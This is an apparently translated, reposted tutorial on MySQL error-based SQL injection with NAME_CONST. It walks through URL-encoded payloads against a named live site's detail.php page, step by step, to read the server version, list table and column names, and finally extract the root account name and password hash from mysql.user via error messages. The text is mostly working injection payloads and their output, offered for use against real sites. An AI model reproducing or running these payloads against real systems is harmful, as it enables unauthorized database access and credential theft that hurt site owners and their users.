
MySQL error-based injection on newer versions: injecting with NAME_CONST

Source: zixuephp.com (自学PHP网)    Date: 2015-04-17 13:03


It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.


Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+



http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261'
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = the MySQL variable or function whose value you want. The derived table x ends up with two columns that carry the same name (the value of VAR), so the server refuses to build it and echoes that name back in a "Duplicate column name" error. The error message is what leaks the data.

MySQL 5.1.3 Server System Variables

Let's try it out on my site.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error:Duplicate column name '5.0.27-community-nt'

 

Now I've tried a couple of sites, and on those the server rejected the NAME_CONST call when I tried to extract data (MySQL reports this as "Incorrect arguments to NAME_CONST"). Nothing was wrong with my syntax; it just wouldn't work there. The reason is the line from the docs above: the arguments should be constants. Newer MySQL releases enforce that, and neither version() nor a subquery is a constant, so this trick in this form only works on older 5.0.x builds such as the 5.0.27 server here. Luckily, it works here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

DATA is the scalar subquery whose result you want. With a literal 1 substituted for it, we should get a "Duplicate column name '1'" error, which confirms the subquery form works before we spend requests on real data...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

 

Now let's pull the table names out of the current database.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


Error: Duplicate column name 'com_admanage'

 

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error:Duplicate column name 'Host'

 

Woot, time to finish this off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

 

And there we have it, thanks for reading.

Excerpted from http://hi.baidu.com/evilrapper/blog/item/323702a10ff4009446106459.html
